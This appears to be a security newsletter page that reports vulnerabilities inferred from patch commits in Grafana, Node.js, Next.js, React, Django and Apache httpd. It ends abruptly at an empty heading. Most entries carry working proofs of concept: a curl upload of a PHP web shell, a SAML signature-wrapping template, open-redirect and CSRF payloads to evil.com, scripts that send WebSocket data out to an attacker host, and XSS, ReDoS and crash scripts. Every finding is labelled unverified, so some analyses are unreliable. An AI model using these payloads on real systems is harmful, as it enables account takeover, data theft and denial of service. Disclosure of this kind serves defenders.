📰 Vulnerability Spoiler Alert


“Exposing patches before CVEs since 2025”

Saturday, March 21, 2026

📋 Today’s Briefing

87
Total Findings
11
Confirmed
69
Unverified
7
False Positives
CRITICAL: 2 HIGH: 29 MEDIUM: 46 LOW: 3

🔥 HIGH UNVERIFIED Broken Access Control / Privilege Escalation

Mar 20, 2026, 11:02 PM — grafana/grafana

Commit: aa672a7

Author: Tito Lins

Before this patch, the GET /api/alertmanager/grafana/config/api/v1/alerts endpoint (which returns the raw Alertmanager configuration blob, potentially containing sensitive credentials like SMTP passwords, webhook secrets, and API tokens) was accessible to any user with the broad 'alert.notifications:read' permission, which was granted to Viewers and Editors. Similarly, GET /config/history and POST /config/history/{id}/_activate were accessible to users with alert.notifications:read/write. The patch restricts these endpoints to admin-only via new fine-grained RBAC actions (alert.notifications.config-history:read/write).

🔍 View Affected Code & PoC

Affected Code

case http.MethodGet + "/api/alertmanager/grafana/config/api/v1/alerts":
    eval = ac.EvalPermission(ac.ActionAlertingNotificationsRead)
case http.MethodGet + "/api/alertmanager/grafana/config/history":
    eval = ac.EvalPermission(ac.ActionAlertingNotificationsRead)

Proof of Concept

As a non-admin Grafana user (Viewer or Editor role) with alert.notifications:read permission, send: GET /api/alertmanager/grafana/config/api/v1/alerts with a valid session cookie. Before the patch, this returns the full raw Alertmanager config including SMTP credentials, webhook URLs with secrets, and API keys. Example: curl -H 'Cookie: grafana_session=<viewer_session>' https://grafana.example.com/api/alertmanager/grafana/config/api/v1/alerts

⚠️ MEDIUM UNVERIFIED Integer Overflow / Division by Zero

Mar 20, 2026, 05:25 PM — nodejs/node

Commit: 7547e79

Author: Node.js GitHub Bot

The patch fixes ICU-23109 in nfrule.cpp where `util64_pow(rule1-&gt;radix, rule1-&gt;exponent)` could overflow to zero, causing a subsequent modulo-by-zero operation (`rule1-&gt;baseValue % util64_pow(rule1-&gt;radix, rule1-&gt;exponent)`). While there was already a comment about preventing `% 0`, the existing check `rule1-&gt;radix != 0` did not guard against the case where the power computation itself overflows to zero. The patch introduces a pre-computed `mod` variable with an explicit overflow check, returning an error status if mod is zero.

🔍 View Affected Code & PoC

Affected Code

if ((rule1->baseValue > 0
    && (rule1->radix != 0) // ICU-23109 Ensure next line won't "% 0"
    && (rule1->baseValue % util64_pow(rule1->radix, rule1->exponent)) == 0)

Proof of Concept

Construct an ICU RuleBasedNumberFormat rule with a large radix and exponent such that util64_pow(radix, exponent) overflows uint64_t to 0, e.g., radix=10, exponent=20+ causes overflow. This triggers division-by-zero in the modulo operation `rule1->baseValue % 0`, which is undefined behavior in C++ and can cause a crash (SIGFPE or abort) when parsing/formatting numbers with such rules in Node.js via the Intl API.
BREAKING

💣 CRITICAL UNVERIFIED XML Signature Wrapping / Authentication Bypass

Mar 20, 2026, 09:36 AM — grafana/grafana

Commit: fa9639f

Author: Matheus Macabu

GHSA-479m-364c-43vc describes a vulnerability in github.com/russellhaering/goxmldsig (used for SAML XML digital signature validation) where an attacker could bypass XML signature verification. The library also depends on github.com/beevik/etree for XML parsing, and the combination of versions before this fix allowed signature wrapping attacks where a malicious SAML response could include a valid signature over one element while the actual authenticated data came from a different, attacker-controlled element. This allowed authentication bypass in Grafana's SAML SSO implementation.

🔍 View Affected Code & PoC

Affected Code

github.com/russellhaering/goxmldsig v1.4.0
github.com/beevik/etree v1.4.1

Proof of Concept

Craft a malicious SAML Response with XML Signature Wrapping:
1. Obtain a valid signed SAML assertion (or intercept one)
2. Wrap it in a crafted XML structure:
<samlp:Response>
  <Signature xmlns="..."><!-- valid signature over benign Assertion --></Signature>
  <saml:Assertion><!-- attacker-controlled assertion with admin privileges -->
    <saml:Subject><saml:NameID>[email protected]</saml:NameID></saml:Subject>
    <saml:AttributeStatement>
      <saml:Attribute Name="role"><saml:AttributeValue>Admin</saml:AttributeValue></saml:Attribute>
    </saml:AttributeStatement>
  </saml:Assertion>
</samlp:Response>
3. The vulnerable goxmldsig v1.4.0 would verify the signature over the benign element but the application would process the attacker's assertion, granting admin access without valid credentials.

⚠️ MEDIUM UNVERIFIED Open Redirect

Mar 19, 2026, 11:44 AM — grafana/grafana

Commit: c62113e

Author: Ezequiel Victorero

The Grafana short URL feature allowed authenticated users to create short URLs with arbitrary target paths, including external URLs like `http://evil.com` or protocol-relative URLs like `//evil.com`. When a victim clicked a Grafana short URL, they would be silently redirected to the attacker-controlled external domain. The patch adds validation at both creation time and redirect time to ensure paths are always relative and cannot contain schemes, protocol-relative prefixes, or other external URL patterns.

🔍 View Affected Code & PoC

Affected Code

// No validation of the path before storing or redirecting
shortURL, err := hs.ShortURLService.CreateShortURL(c.Req.Context(), c.SignedInUser, cmd)
// ...
c.Redirect(setting.ToAbsUrl(shortURL.Path), http.StatusFound)

Proof of Concept

1. Authenticate to Grafana as any signed-in user
2. POST /api/short-urls with body: {"path": "//evil.com/phishing-page"}
3. Receive response with a short URL like: https://grafana.example.com/goto/AbCdEfGh
4. Send this short URL to a victim - when clicked, browser follows redirect to //evil.com/phishing-page (interpreted as https://evil.com/phishing-page)

Alternatively: POST /api/short-urls with body: {"path": "http://evil.com"} to redirect to an explicit external URL.

🔥 HIGH UNVERIFIED Denial of Service / HTTP/2 Protocol Vulnerability

Mar 19, 2026, 10:22 AM — grafana/grafana

Commit: 5a117a2

Author: Hugo Häggmark

This commit patches CVE-2026-33186 in the google.golang.org/grpc library by upgrading from v1.79.1 to v1.79.3. The vulnerability exists in the gRPC-Go HTTP/2 implementation and can be exploited to cause a denial of service condition. The patch updates the dependency across multiple Go modules in the Grafana repository to remediate the vulnerability.

🔍 View Affected Code & PoC

Affected Code

google.golang.org/grpc v1.79.1

Proof of Concept

A malicious client connecting to any gRPC endpoint could send specially crafted HTTP/2 frames to exploit the vulnerability in grpc-go v1.79.1, causing the server to crash or become unresponsive. For example: using a gRPC client to send malformed/crafted HTTP/2 HEADERS or DATA frames to a Grafana gRPC service endpoint, triggering the DoS condition in the affected grpc-go HTTP/2 handler code.

🔥 HIGH UNVERIFIED Improper Access Control / Authentication Bypass

Mar 18, 2026, 08:46 PM — apache/httpd

Commit: e8b5fdc

Author: Rich Bowen

The original example configuration had 'Require all granted' at the Directory level, which grants unauthenticated access to all users by default. The LimitExcept block only required authentication for non-GET/POST/OPTIONS methods, but the outer 'Require all granted' could override authentication requirements depending on configuration context. The patch removes 'Require all granted' and replaces the LimitExcept approach with a RequireAny block that properly requires either the correct HTTP method OR an authenticated admin user, ensuring write operations require authentication.

🔍 View Affected Code & PoC

Affected Code

&lt;Directory "/usr/local/apache2/htdocs/foo"&gt;
    Require all granted
    Dav On
    ...
    &lt;LimitExcept GET POST OPTIONS&gt;
        Require user admin
    &lt;/LimitExcept&gt;

Proof of Concept

With the old config, an unauthenticated user could perform WebDAV write operations: `curl -X PUT http://example.com/foo/malicious.php -d '<?php system($_GET["cmd"]); ?>'` - The 'Require all granted' directive grants access to all users, and depending on Apache's authorization merging behavior, could allow unauthenticated PUT/DELETE/MKCOL requests to modify server files, potentially leading to remote code execution.

⚠️ MEDIUM UNVERIFIED Authorization Bypass / Privilege Escalation

Mar 18, 2026, 11:18 AM — grafana/grafana

Commit: d46801e

Author: Roberto Jiménez Sánchez

Before the patch, a resource manager could be changed directly from one manager to another (e.g., from repo:abc to terraform:xyz) in a single update operation without going through a remove-then-add workflow. This allowed one management system (e.g., Terraform) to silently take over resources managed by another system (e.g., a Git repository), potentially leading to unauthorized control over managed resources and unpredictable reconciliation conflicts. The patch adds an explicit check that blocks any update where both old and new objects have a manager set but with different values, returning HTTP 403.

🔍 View Affected Code & PoC

Affected Code

managerNew, okNew := obj.GetManagerProperties()
managerOld, okOld := old.GetManagerProperties()
if managerNew == managerOld || (okNew && !okOld) { // added manager is OK
    return nil
}

Proof of Concept

// A resource managed by repo:abc can be hijacked by terraform:xyz in one step:
// 1. GET /apis/dashboard.grafana.app/v1beta1/namespaces/default/dashboards/dashboard-uid
// 2. Modify annotations and PUT/UPDATE:
// annotations["grafana.app/manager-kind"] = "terraform"
// annotations["grafana.app/manager-identity"] = "attacker-terraform-workspace"
// PUT /apis/dashboard.grafana.app/v1beta1/namespaces/default/dashboards/dashboard-uid
// Before patch: returns 200 OK, resource is now managed by terraform instead of repo
// After patch: returns 403 Forbidden with message 'Cannot change resource manager; remove the existing manager first, then add the new one'

⚠️ MEDIUM UNVERIFIED Broken Access Control

Mar 17, 2026, 11:28 PM — grafana/grafana

Commit: 1c12cf1

Author: Stephanie Hingtgen

Before this patch, the Grafana Live push endpoint (`/api/live/push/:streamId`) had no RBAC authorization check, allowing any authenticated user (including Viewers) to push metrics and events to Grafana Live streams. The patch adds an `authorize(ac.EvalPermission(ac.ActionLivePush))` middleware that restricts this endpoint to users with the `live:push` permission (granted to Editors and Admins by default).

🔍 View Affected Code & PoC

Affected Code

liveRoute.Post("/push/:streamId", hs.LivePushGateway.Handle)

Proof of Concept

As a Viewer-role user with valid session credentials, send: POST /api/live/push/anystream with body `cpu usage=0.5` and a valid session cookie or API key. Before the patch, this would return HTTP 200 and successfully push data to the stream. After the patch, it returns HTTP 403.

⚠️ MEDIUM UNVERIFIED Cross-Origin Request Forgery / Unauthorized Access to Dev Resources

Mar 17, 2026, 11:02 PM — vercel/next.js

Commit: b2b802c

Author: Zack Tanner

Before this patch, Next.js development servers only warned (but did not block) cross-origin requests to internal dev assets and endpoints (/_next/*, /__nextjs*) when `allowedDevOrigins` was not configured. An attacker could craft a malicious webpage that loads or interacts with internal dev-only resources (HMR WebSocket, error feedback endpoints, internal chunks) from any origin. The patch changes the default behavior from warn-only to blocking with a 403 response, preventing unauthorized cross-origin access to dev server internals.

🔍 View Affected Code & PoC

Affected Code

const mode = typeof allowedDevOrigins === 'undefined' ? 'warn' : 'block'
// ...
return warnOrBlockRequest(res, refererHostname, mode)
// ...
warnOrBlockRequest(res, originLowerCase, mode)

Proof of Concept

# Attacker hosts a page at https://attacker.example.com/exploit.html
# Developer is running Next.js dev server at http://localhost:3000

# The following page silently exfiltrates Next.js internal dev chunks or
# makes requests to internal endpoints without being blocked:

<html>
<body>
<script>
  // Before patch: this request succeeds with 200 (only a warning in CLI)
  fetch('http://localhost:3000/_next/static/chunks/pages/_app.js', {
    mode: 'no-cors',
    headers: { 'Sec-Fetch-Mode': 'no-cors', 'Sec-Fetch-Site': 'cross-site' }
  });

  // Or connect to HMR WebSocket to observe file changes
  const ws = new WebSocket('ws://localhost:3000/_next/webpack-hmr');
  ws.onmessage = (e) => { fetch('https://attacker.example.com/collect?d='+e.data); };
</script>
</body>
</html>

🔥 HIGH UNVERIFIED Authentication Bypass

Mar 17, 2026, 06:36 PM — grafana/grafana

Commit: 4eb83a7

Author: MdTanwer

The MSSQL connection string was built by directly concatenating the username and password without escaping special characters. Since semicolons are used as key-value delimiters in the connection string, a password containing a semicolon would be truncated at the semicolon, allowing authentication bypass or connection to unintended databases. For example, a password like `StrongPass;database=other` would cause the driver to parse `database=other` as a separate connection string parameter.

🔍 View Affected Code & PoC

Affected Code

connStr += fmt.Sprintf("user id=%s;password=%s;", dsInfo.User, dsInfo.DecryptedSecureJSONData["password"])

Proof of Concept

Set password to: `wrongpass;user id=sa` — the resulting connection string becomes `server=localhost;database=mydb;user id=user;password=wrongpass;user id=sa;` which causes go-mssqldb to use `sa` as the user id (last value wins in many parsers), potentially authenticating as a different user than intended. Alternatively, password=`x;database=master` redirects the connection to the master database regardless of configured database.

🔥 HIGH UNVERIFIED Authorization Bypass / Privilege Escalation

Mar 17, 2026, 03:06 PM — grafana/grafana

Commit: 3293279

Author: Yuri Tseretyan

The provisioning API's `UpdateContactPoint` endpoint did not perform authorization checks for protected fields (e.g., webhook URLs, API keys) before the patch. Any user with access to the provisioning API could modify protected/sensitive fields in contact points without the required `receivers:update.protected` permission, bypassing the security controls enforced by the regular receiver API. The patch adds a `checkProtectedFields` method that verifies the user has appropriate permissions before allowing modifications to protected fields.

🔍 View Affected Code & PoC

Affected Code

func (ecp *ContactPointService) UpdateContactPoint(ctx context.Context, orgID int64, contactPoint apimodels.EmbeddedContactPoint, provenance models.Provenance) error {

Proof of Concept

A user with provisioning API access but without `receivers:update.protected` permission could send:

PUT /api/v1/provisioning/contact-points/{uid}
Content-Type: application/json
X-Disable-Provenance: true

{"uid":"existing-uid","name":"My Slack","type":"slack","settings":{"url":"https://attacker.com/steal-alerts"},"disableResolveMessage":false}

This would overwrite the protected webhook URL field without the `receivers:update.protected` permission check, allowing an attacker to redirect alert notifications to an attacker-controlled endpoint or exfiltrate alert data.

💡 LOW UNVERIFIED Input Validation Bypass / Size Guard Bypass

Mar 17, 2026, 10:50 AM — facebook/react

Commit: 12ba7d8

Author: Sebastian "Sebbie" Silbermann

The `$B` (Blob) case in `parseModelString` did not validate that the FormData entry was actually a Blob before returning it. Since `FormData.get()` can return either a string or a Blob/File, an attacker could craft a malformed Server Action payload that stores a large string under a key and references it via `$B`, bypassing the `bumpArrayCount` size guard that applies to regular string values. The patch adds an `instanceof Blob` check that throws an error if the backing entry is not a real Blob, closing this bypass. While the PR notes this doesn't produce meaningful amplification on its own, it is a defense-in-depth fix against potential combined attacks.

🔍 View Affected Code & PoC

Affected Code

const backingEntry: Blob = (response._formData.get(blobKey): any);
return backingEntry;

Proof of Concept

const formData = new FormData();
formData.set('1', '-'.repeat(50000)); // large string, not a Blob
formData.set('0', JSON.stringify(['$B1'])); // reference it as a Blob
await ReactServerDOMServer.decodeReply(formData, webpackServerMap);
// Before patch: returns the large string bypassing blob size guards
// After patch: throws 'Referenced Blob is not a Blob.'

🔥 HIGH UNVERIFIED Open Redirect / Server-Side Request Forgery (SSRF)

Mar 17, 2026, 01:41 AM — vercel/next.js

Commit: 00bdb03

Author: Zack Tanner

The commit patches the compiled `http-proxy` / `follow-redirects` library bundled in Next.js, referencing security advisory GHSA-ggv3-7p47-pfv8. The vulnerability involves improper handling of HTTP redirects in the `follow-redirects` library, which could allow an attacker to manipulate redirect targets to leak sensitive request headers (such as Authorization) to unintended hosts or bypass security controls via crafted redirect responses. The patch updates the compiled bundle with fixes to the redirect handling logic.

🔍 View Affected Code & PoC

Affected Code

var r=e.headers.location;if(r&&this._options.followRedirects!==false&&t>=300&&t<400){this._currentRequest.removeAllListeners();this._currentRequest.on("error",noop);this._currentRequest.abort();e.destroy();if(++this._redirectCount>this._options.maxRedirects){this.emit("error",new Error("Max redirects exceeded."));return}

Proof of Concept

An attacker controls a server that returns a 301 redirect response pointing to an attacker-controlled host. When a Next.js application proxies a request with an Authorization header to the attacker's initial URL, the follow-redirects library follows the redirect and forwards the Authorization header to the attacker's second host:

1. Victim Next.js app makes request: GET https://attacker.com/step1 with 'Authorization: Bearer secret-token'
2. attacker.com/step1 responds: HTTP/1.1 301 Moved Permanently\r\nLocation: https://evil.com/collect\r\n
3. The vulnerable follow-redirects code follows the redirect and sends GET https://evil.com/collect with 'Authorization: Bearer secret-token'
4. Attacker's evil.com receives the sensitive token

This is exploitable when Next.js rewrites/proxies user-controlled or partially-controlled URLs with sensitive headers attached.

🔥 HIGH UNVERIFIED Cross-Site Request Forgery (CSRF)

Mar 17, 2026, 01:57 AM — vercel/next.js

Commit: a27a11d

Author: Zack Tanner

Before the patch, when the `Origin` header was set to the string `'null'` (which browsers send from privacy-sensitive contexts like sandboxed iframes), Next.js would skip the CSRF origin check entirely because the code treated `'null'` as a missing/invalid origin and fell through without validation. This allowed an attacker to embed a sandboxed iframe that submits a Server Action cross-origin with user credentials (cookies) attached, bypassing CSRF protection. The patch now treats `'null'` as a valid but opaque origin and checks it against the `allowedOrigins` allowlist, blocking unauthorized cross-origin Server Action submissions from sandboxed contexts.

🔍 View Affected Code & PoC

Affected Code

const originDomain =
    typeof originHeader === 'string' && originHeader !== 'null'
      ? new URL(originHeader).host
      : undefined

Proof of Concept

Attacker hosts malicious page at https://evil.com with:
<iframe sandbox="allow-forms" src="https://evil.com/attack.html"></iframe>

attack.html contains:
<form method="POST" action="https://victim.com/sensitive-page">
  <input name="$ACTION_ID_abc123" value="" />
  <input type="submit" />
</form>
<script>document.forms[0].submit()</script>

Browser sends: Origin: null (opaque origin from sandboxed iframe)
Before patch: originDomain = undefined, CSRF check is skipped with only a warning, action executes with victim's cookies.
After patch: originHost = 'null', checked against allowedOrigins; since 'null' is not in allowedOrigins, request is rejected with 403/500.

🔥 HIGH UNVERIFIED Cross-Site WebSocket Hijacking / CSRF

Mar 17, 2026, 12:42 AM — vercel/next.js

Commit: 862f9b9

Author: Zack Tanner

Before the patch, WebSocket connections to Next.js dev server endpoints (e.g., /_next/webpack-hmr) were accepted from privacy-sensitive origins (e.g., pages served with 'sandbox' CSP that sets origin to null). The old code only blocked requests when rawOrigin was truthy AND not equal to 'null', meaning requests with origin header 'null' (sent by sandboxed iframes/pages) bypassed origin validation entirely. The patch fixes this by treating a 'null' origin as a defined but non-allowed origin, causing such requests to be blocked.

🔍 View Affected Code & PoC

Affected Code

if (rawOrigin && rawOrigin !== 'null') {
    const parsedOrigin = parseUrl(rawOrigin)
    if (parsedOrigin) {
      const originLowerCase = parsedOrigin.hostname.toLowerCase()
      if (!isCsrfOriginAllowed(originLowerCase, allowedOrigins)) {
        return warnOrBlockRequest(res, originLowerCase, mode)
      }
    }
  }
  return false

Proof of Concept

1. Attacker hosts a page at http://attacker.com/ with Content-Security-Policy: sandbox allow-scripts (causing browser to send Origin: null for requests)
2. Page contains: <script>const ws = new WebSocket('http://localhost:3000/_next/webpack-hmr'); ws.onmessage = (e) => { fetch('https://attacker.com/collect?d='+encodeURIComponent(e.data)) }</script>
3. Victim (developer) visits http://attacker.com/ while running Next.js dev server
4. Browser sends WebSocket upgrade with Origin: null header
5. Old code skips validation (rawOrigin === 'null' condition exits early), connection is accepted
6. Attacker can receive HMR messages, potentially revealing source code structure or injecting malicious HMR updates

🔥 HIGH UNVERIFIED Missing Authorization / Broken Access Control

Mar 16, 2026, 11:31 PM — grafana/grafana

Commit: 5c89af6

Author: Ezequiel Victorero

Before this patch, the Kubernetes API endpoints for dashboard snapshots (GET, LIST, DELETE, POST /create, DELETE /delete/{deleteKey}, GET /settings) used a default `ServiceAuthorizer` that did not enforce RBAC permissions for snapshot resources. Any authenticated user, regardless of their assigned permissions, could read, list, create, and delete snapshots. The patch adds a `SnapshotAuthorizer` that maps K8s verbs to Grafana RBAC actions (`snapshots:read`, `snapshots:create`, `snapshots:delete`) and applies RBAC checks to the custom HTTP routes as well.

🔍 View Affected Code & PoC

Affected Code

func (b *DashboardsAPIBuilder) GetAuthorizer() authorizer.Authorizer {
	return grafanaauthorizer.NewServiceAuthorizer()
}

Proof of Concept

A user with no snapshot permissions (e.g., Org role 'None') can access snapshot data:

GET /apis/dashboard.grafana.app/v0alpha1/namespaces/org-1/snapshots
  -> Returns 200 OK with snapshot list (should be 403 Forbidden)

DELETE /apis/dashboard.grafana.app/v0alpha1/namespaces/org-1/snapshots/{snapshotKey}
  -> Returns 200 OK (should be 403 Forbidden)

POST /apis/dashboard.grafana.app/v0alpha1/namespaces/org-1/snapshots/create
  Body: {"dashboard":{"uid":"existing-uid","title":"test"},"name":"stolen"}
  -> Returns 200 OK creating a snapshot (should be 403 Forbidden)

🔥 HIGH UNVERIFIED Broken Access Control / Insecure Direct Object Reference

Mar 16, 2026, 07:55 PM — grafana/grafana

Commit: f62299e

Author: Michael Mandrus

Public dashboard CRUD endpoints (Delete, Update, ExistsEnabledByDashboardUid) were only checking the user's role/permissions but not validating that the public dashboard being operated on belonged to the same organization as the requesting user. This allowed an authenticated user with Editor+ permissions in Org B to delete, update, or check the existence of public dashboards belonging to Org A, without having access to the source dashboard. The patch adds org_id checks to all relevant database queries to enforce org isolation.

🔍 View Affected Code & PoC

Affected Code

func (d *PublicDashboardStoreImpl) Delete(ctx context.Context, uid string) (int64, error) {
	dashboard := &PublicDashboard{Uid: uid}
	var affectedRows int64
	err := d.sqlStore.WithDbSession(ctx, func(sess *db.Session) error {
		var err error
		affectedRows, err = sess.Delete(dashboard)

Proof of Concept

# Attacker is admin in OrgB (orgId=2), wants to delete a public dashboard in OrgA (orgId=1)
# They know the dashboardUid and public dashboard uid from prior reconnaissance
curl -X DELETE http://orgb_admin:password@localhost:3000/api/dashboards/uid/orgA_dashboard_uid/public-dashboards/orgA_pubdash_uid
# Before patch: deletion succeeds because only RBAC role is checked, not org ownership
# The Delete service call was: api.PublicDashboardService.Delete(c.Req.Context(), uid, dashboardUid)
# without passing c.GetOrgID(), so the store deleted any public dashboard matching uid regardless of org

🔥 HIGH UNVERIFIED XSS / Prototype Pollution

Mar 6, 2026, 08:24 AM — grafana/grafana

Commit: cf7d85c

Author: dependabot\[bot\]

DOMPurify 3.3.1 contained multiple security vulnerabilities: a bypass via jsdom's faulty raw-text tag parsing that could allow XSS payloads to pass through sanitization, a prototype pollution issue when working with custom elements, and a lenient config parsing issue in `_isValidAttribute`. These vulnerabilities could allow attackers to inject malicious HTML/JavaScript that bypasses DOMPurify's sanitization, leading to XSS attacks in Grafana's frontend which uses DOMPurify to sanitize user-supplied content.

🔍 View Affected Code & PoC

Affected Code

"dompurify": "3.3.1"

Proof of Concept

// Prototype pollution via custom elements in DOMPurify 3.3.1:
// An attacker could craft input like:
const payload = '<custom-element constructor="polluted"></custom-element>';
DOMPurify.sanitize(payload); // Could pollute Object.prototype

// XSS bypass via jsdom raw-text tag parsing:
const xssPayload = '<script type="text/plain"></script><img src=x onerror=alert(document.cookie)>';
// In jsdom environments, DOMPurify 3.3.1 might fail to sanitize this correctly,
// allowing the onerror handler to execute when rendered in a browser

⚠️ MEDIUM UNVERIFIED Regular Expression Denial of Service (ReDoS)

Mar 6, 2026, 08:34 AM — grafana/grafana

Commit: 333964d

Author: Jack Westbrook

The minimatch package prior to version 3.1.2 (and related versions) contained a ReDoS vulnerability (CVE-2022-3517) where specially crafted patterns could cause catastrophic backtracking in the regular expression engine. This patch upgrades minimatch from vulnerable versions (3.0.5, 9.0.3, 5.0.1, 7.4.6) to patched versions (3.1.4, 10.2.4, 5.1.9, 7.4.9) that fix the ReDoS issue. The vulnerability could allow an attacker to cause denial of service by providing a malicious glob pattern.

🔍 View Affected Code & PoC

Affected Code

minimatch: "npm:3.0.5"  // in @lerna/create and lerna dependencies
minimatch: "npm:9.0.3"  // in @nx/devkit
minimatch: "npm:5.0.1"  // version ^5.0.1
minimatch: "npm:7.4.6"  // version ^7.4.3

Proof of Concept

const minimatch = require('[email protected]');
// CVE-2022-3517: ReDoS with crafted input
// The following pattern causes catastrophic backtracking:
const start = Date.now();
minimatch('a' + 'a'.repeat(25) + '!', '{' + 'a,' .repeat(25) + 'b}');
console.log('Time:', Date.now() - start, 'ms'); // Takes exponentially long time, causing DoS

🔥 HIGH UNVERIFIED Prototype Pollution

Mar 6, 2026, 08:12 AM — grafana/grafana

Commit: d0a5b71

Author: dependabot\[bot\]

The immutable library versions prior to 5.1.5 contained a Prototype Pollution vulnerability (Improperly Controlled Modification of Object Prototype Attributes). This allowed attackers to manipulate JavaScript object prototypes through specially crafted keys like '__proto__', 'constructor', or 'prototype', potentially affecting all objects in the application. The patch upgrades immutable from 5.1.4 to 5.1.5 which fixes this vulnerability.

🔍 View Affected Code & PoC

Affected Code

"immutable": "5.1.4"

Proof of Concept

const { fromJS } = require('[email protected]');
const malicious = fromJS(JSON.parse('{"__proto__": {"polluted": true}}'));
console.log(({}).polluted); // true - prototype has been polluted
// This allows attackers to inject properties into Object.prototype,
// affecting all subsequent object property lookups in the application

🔥 HIGH UNVERIFIED Use-After-Free / Memory Corruption

Mar 6, 2026, 06:01 AM — nodejs/node

Commit: a06e789

Author: Gerhard Stöbich

When pipelined HTTP requests arrive in a single TCP segment, llhttp_execute() processes all of them in one call. If a synchronous 'close' event handler calls freeParser() mid-execution, cleanParser() nulls out parser state while llhttp_execute() is still on the call stack, causing use-after-free/null-pointer dereference crashes on subsequent callbacks. The patch adds an is_being_freed_ flag that causes the Proxy::Raw callback to return early (HPE_USER) when set, aborting llhttp_execute() before it accesses freed/nulled parser state.

🔍 View Affected Code & PoC

Affected Code

if (parser->connectionsList_ != nullptr) {
  parser->connectionsList_->Pop(parser);
  parser->connectionsList_->PopActive(parser);
}

Proof of Concept

const { createServer } = require('http');
const { connect } = require('net');
const server = createServer((req, res) => {
  // Synchronously emit 'close' to trigger freeParser() while llhttp_execute() is still on the stack
  req.socket.emit('close');
  res.end();
});
server.listen(0, () => {
  const client = connect(server.address().port);
  // Send two pipelined requests in one write - processed by a single llhttp_execute() call
  // When 'close' fires during first request, parser is freed while second request is still being parsed
  client.end(
    'GET / HTTP/1.1\r\nHost: localhost\r\nConnection: keep-alive\r\n\r\n' +
    'GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n'
  );
});
// Result before patch: process crashes with SIGSEGV or assertion failure due to null pointer dereference

⚠️ MEDIUM UNVERIFIED ReDoS (Regular Expression Denial of Service)

Mar 3, 2026, 11:14 PM — nodejs/node

Commit: 330e3ee

Author: dependabot\[bot\]

The minimatch library versions before 3.1.5 contained a ReDoS vulnerability where specially crafted glob patterns could cause catastrophic backtracking in regular expression matching, leading to excessive CPU consumption and denial of service. The fix in 3.1.5 includes limiting recursion in pattern matching to prevent exponential backtracking. However, this affects only developer tooling (clang-format), not the Node.js runtime itself, limiting real-world impact.

🔍 View Affected Code & PoC

Affected Code

"version": "3.1.3",
"resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.3.tgz",
"integrity": "sha512-M2GCs7Vk83NxkUyQV1bkABc4yxgz9kILhHImZiBPAZ9ybuvCb0/H7lEl5XvIg3g+9d4eNotkZA5IWwYl0tibaA=="

Proof of Concept

const minimatch = require('minimatch');
// This pattern causes catastrophic backtracking in minimatch < 3.1.5
const maliciousPattern = '{' + 'a,'.repeat(100) + 'a}';
console.time('match');
minimatch('aaaaaaaaaaaaaaaaaaaaaaaaa', maliciousPattern);
console.timeEnd('match'); // Takes extremely long time, blocking event loop

🔥 HIGH UNVERIFIED Path Traversal / Arbitrary File Overwrite

Mar 3, 2026, 02:57 PM — grafana/grafana

Commit: 44fe577

Author: Jack Westbrook

The `tar` npm package versions 6.x and earlier contain a path traversal vulnerability (CVE-2024-28863 and related CVEs) where specially crafted tar archives can write files outside the intended extraction directory. By bumping `tar` from version 6.x to 7.x, this patch removes the vulnerable version and its dependency chain (including the old `cacache@^15.2.0` which depended on `tar@^6.0.2`). The vulnerability allowed an attacker to craft a malicious tarball that, when extracted, could overwrite arbitrary files on the filesystem.

🔍 View Affected Code & PoC

Affected Code

"cacache@npm:^15.2.0":
  tar: "npm:^6.0.2"
  ...
(tar 6.x is vulnerable to path traversal via crafted archive entries)

Proof of Concept

Using tar 6.x: create a malicious tarball with an entry path like '../../../../etc/cron.d/malicious' that traverses outside the extraction directory. When extracted via tar.extract({cwd: '/safe/dir'}), the file is written to /etc/cron.d/malicious instead. Example: `const tar = require('tar'); tar.x({file: 'malicious.tar', cwd: '/tmp/safe'})` where malicious.tar contains an entry with path '../../../tmp/pwned' using a crafted header with absolute or traversal path sequences.

⚠️ MEDIUM UNVERIFIED Denial of Service (DoS)

Jan 30, 2026, 01:52 AM — django/django

Commit: 951ffb3

Author: Natalia

Django's URLField.to_python() used urlsplit() to detect URL schemes, which on Windows performs NFKC Unicode normalization. This normalization is disproportionately slow for inputs containing certain Unicode characters (e.g., characters like '¾'), allowing an attacker to craft a POST payload that causes excessive CPU consumption. The patch replaces urlsplit() with str.partition(':') for scheme detection, avoiding Unicode normalization entirely.

🔍 View Affected Code & PoC

Affected Code

try:
    return list(urlsplit(url))
except ValueError:
    # urlsplit can raise a ValueError with some
    # misformatted URLs.
    raise ValidationError(self.error_messages["invalid"], code="invalid")

Proof of Concept

On Windows, send a POST request with a URLField value containing a large string of Unicode characters that trigger slow NFKC normalization:

import requests
# Craft a payload with characters that cause slow NFKC normalization
payload = {'url_field': 'http://' + '\u00be' * 50000}  # '¾' repeated 50000 times
requests.post('http://target-django-app/form/', data=payload)
# This causes urlsplit() to perform slow Unicode normalization on Windows,
# consuming excessive CPU and potentially blocking the server's worker threads.

💡 LOW UNVERIFIED Incorrect Permissions / Race Condition (umask)

Jan 21, 2026, 09:03 PM — django/django

Commit: 019e44f

Author: Natalia

In multi-threaded Django applications, the file-based cache backend and filesystem storage used temporary umask changes (via os.umask()) to control directory permissions when creating directories. Because os.umask() is a process-wide operation, a temporary umask change in one thread could affect directory/file creation in other threads, resulting in file system objects being created with unintended (potentially overly permissive) permissions. The patch replaces the umask manipulation approach with a safe_makedirs() function that uses os.chmod() after os.mkdir() to enforce the exact requested permissions.

🔍 View Affected Code & PoC

Affected Code

old_umask = os.umask(0o077)
try:
    os.makedirs(self._dir, 0o700, exist_ok=True)
finally:
    os.umask(old_umask)

Proof of Concept

import threading, os, tempfile, time
# In a multi-threaded Django app using FileBasedCache:
# Thread A calls _createdir() which sets umask to 0o077
# Thread B simultaneously creates a file/directory expecting default umask (e.g., 0o022)
# Thread B's file ends up with permissions masked by Thread A's 0o077 umask
# Concrete example:
tmp = tempfile.mkdtemp()
def thread_a():
    # Simulates FileBasedCache._createdir() - sets umask to 0o077
    os.umask(0o077)
    time.sleep(0.01)  # holds umask while thread B runs
    os.umask(0o022)  # restore

def thread_b():
    time.sleep(0.005)  # starts after thread A changes umask
    path = os.path.join(tmp, 'upload_dir')
    os.makedirs(path, 0o755, exist_ok=True)  # intended: rwxr-xr-x
    print(oct(os.stat(path).st_mode))  # actual: 0o700 (too restrictive) due to umask 0o077

ta = threading.Thread(target=thread_a)
tb = threading.Thread(target=thread_b)
ta.start(); tb.start(); ta.join(); tb.join()

🔥 HIGH UNVERIFIED HTTP Header Injection (CRLF Injection)

